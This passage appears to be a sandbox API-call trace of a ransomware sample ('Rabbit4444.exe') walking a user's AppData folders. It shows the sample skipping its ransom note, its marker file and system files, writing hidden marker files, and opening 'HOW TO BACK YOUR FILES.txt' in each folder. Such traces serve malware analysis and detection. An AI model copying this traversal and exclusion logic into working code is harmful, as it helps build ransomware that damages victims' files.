-1 [0064.040] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0064.040] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0064.040] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0064.040] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0064.040] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0064.040] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0064.040] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0064.040] lstrcmpiW (lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0064.040] lstrcpyW (in: lpString1=0x130ebf0, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0064.040] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0064.040] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122060 [0064.040] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xcc) returned 0x108760 [0064.040] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122068 | out: ListHead=0xf68b0, ListEntry=0x122068) returned 0x1222a8 [0064.040] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xe3e7bf5e, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd1871c50, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe3e7bf5e, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0064.040] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.040] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.040] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned -1 [0064.040] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0064.040] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0064.040] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0064.041] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0064.041] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0064.041] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0064.041] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0064.041] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0064.041] lstrcpyW (in: lpString1=0x130ebf0, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0064.041] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0064.043] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122360 [0064.043] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd0) returned 0x108688 [0064.043] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122368 | out: ListHead=0xf68b0, ListEntry=0x122368) returned 0x122068 [0064.043] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xe3e7bf5e, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd18be980, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x5106299e, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0064.043] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.043] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.043] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0064.043] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0064.043] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0064.044] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0064.044] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0064.044] lstrcmpiW (lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0064.044] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0064.044] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0064.044] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0064.044] lstrcpyW (in: lpString1=0x130ebf0, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0064.044] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0064.044] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fa0 [0064.044] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xd0) returned 0x108838 [0064.044] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fa8 | out: ListHead=0xf68b0, ListEntry=0x121fa8) returned 0x122368 [0064.044] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3e7bf5e, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd18c12bc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe3e7bf5e, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0064.044] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0064.044] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.044] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0064.044] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0064.044] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0064.044] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0064.044] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0064.044] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0064.044] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0064.044] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0064.044] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0064.044] lstrcpyW (in: lpString1=0x130ebf0, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0064.044] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122080 [0064.044] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc2) returned 0x116ba0 [0064.044] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122088 | out: ListHead=0xf68b0, ListEntry=0x122088) returned 0x121fa8 [0064.045] FindNextFileW (in: hFindFile=0x102750, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3e7bf5e, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd18c12bc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe3e7bf5e, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0064.045] FindClose (in: hFindFile=0x102750 | out: hFindFile=0x102750) returned 1 [0064.045] lstrcpyW (in: lpString1=0x130ebf0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.045] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x278 [0064.045] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2cc [0064.045] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.046] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.046] CloseHandle (hObject=0x2cc) returned 1 [0064.046] CloseHandle (hObject=0x278) returned 1 [0064.046] GetCurrentThreadId () returned 0xd98 [0064.046] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122088 [0064.046] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\Temp" [0064.046] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x116ba0 | out: hHeap=0xe0000) returned 1 [0064.046] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122080 | out: hHeap=0xe0000) returned 1 [0064.046] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\Temp" [0064.046] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\Temp\\" [0064.046] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0064.047] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.049] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.052] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.055] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.055] CloseHandle (hObject=0x2cc) returned 1 [0064.055] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\Temp") returned 96 [0064.055] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.055] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3e7bf5e, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd18c12bc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef7f71df, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a50 [0064.055] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.055] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.056] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.056] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.056] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3e7bf5e, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd18c12bc, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef7f71df, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.056] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.056] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.056] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.056] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.056] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.056] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef7f71df, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef7f71df, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef7f71df, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.056] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.056] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.056] FindNextFileW (in: hFindFile=0x102a50, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef7f71df, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef7f71df, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef7f71df, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0064.056] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0064.056] lstrcpyW (in: lpString1=0x130ebfa, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0064.056] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0064.057] CreateFileMappingW (hFile=0x2cc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2a0 [0064.057] MapViewOfFile (hFileMappingObject=0x2a0, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0064.057] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0064.057] CloseHandle (hObject=0x2a0) returned 1 [0064.057] CloseHandle (hObject=0x2cc) returned 1 [0064.057] GetCurrentThreadId () returned 0xd98 [0064.057] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fa8 [0064.057] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory" [0064.057] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108838 | out: hHeap=0xe0000) returned 1 [0064.057] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fa0 | out: hHeap=0xe0000) returned 1 [0064.057] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory" [0064.057] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\" [0064.057] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0064.058] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2cc [0064.059] WriteFile (in: hFile=0x2cc, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0064.064] FlushFileBuffers (hFile=0x2cc) returned 1 [0064.064] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0064.065] CloseHandle (hObject=0x2cc) returned 1 [0064.065] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory") returned 103 [0064.065] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0064.065] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe3e7bf5e, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd18be980, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef81d439, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0064.065] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.065] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.065] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0064.065] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0064.065] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe3e7bf5e, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd18be980, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef81d439, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0064.065] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.065] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0064.065] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0064.065] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0064.065] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0064.065] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xef81d439, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xef81d439, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xef81d439, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0064.065] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.065] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0064.065] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5106299e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5106299e, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x5106299e, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BackgroundTransferApi", cAlternateFileName="BACKGR~1")) returned 1 [0064.066] lstrcmpiW (lpString1="BackgroundTransferApi", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.066] lstrcmpiW (lpString1="BackgroundTransferApi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0064.066] lstrcmpiW (lpString1="BackgroundTransferApi", lpString2="Rabbit4444.exe") returned -1 [0064.066] lstrcmpiW (lpString1="BackgroundTransferApi", lpString2=".") returned 1 [0064.066] lstrcmpiW (lpString1="BackgroundTransferApi", lpString2="..") returned 1 [0064.066] lstrcmpiW (lpString1="BackgroundTransferApi", lpString2="windows") returned -1 [0064.066] lstrcmpiW (lpString1="BackgroundTransferApi", lpString2="bootmgr") returned -1 [0064.066] lstrcmpiW (lpString1="BackgroundTransferApi", lpString2="pagefile.sys") returned -1 [0064.066] lstrcmpiW (lpString1="BackgroundTransferApi", lpString2="boot") returned -1 [0064.066] lstrcmpiW (lpString1="BackgroundTransferApi", lpString2="ids.txt") returned -1 [0064.066] lstrcmpiW (lpString1="BackgroundTransferApi", lpString2="NTUSER.DAT") returned -1 [0064.066] lstrcpyW (in: lpString1=0x130ec08, lpString2="BackgroundTransferApi" | out: lpString1="BackgroundTransferApi") returned="BackgroundTransferApi" [0064.066] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\microsoft.windowscommunicationsapps_8wekyb3d8bbwe\\AC\\INetHistory\\BackgroundTransferApi", dwFileAttributes=0x2012) returned 1 [0064.066] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122080 [0064.066] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xfc) returned 0x123760 [0064.066] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122088 | out: ListHead=0xf68b0, ListEntry=0x122088) returned 0x122368 [0064.066] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x5106299e, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x5106299e, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x5106299e, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BackgroundTransferApiGroup", cAlternateFileName="BACKGR~2")) returned 1 [0064.066] lstrcmpiW (lpString1="BackgroundTransferApiGroup", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0064.066] lstrcmpiW 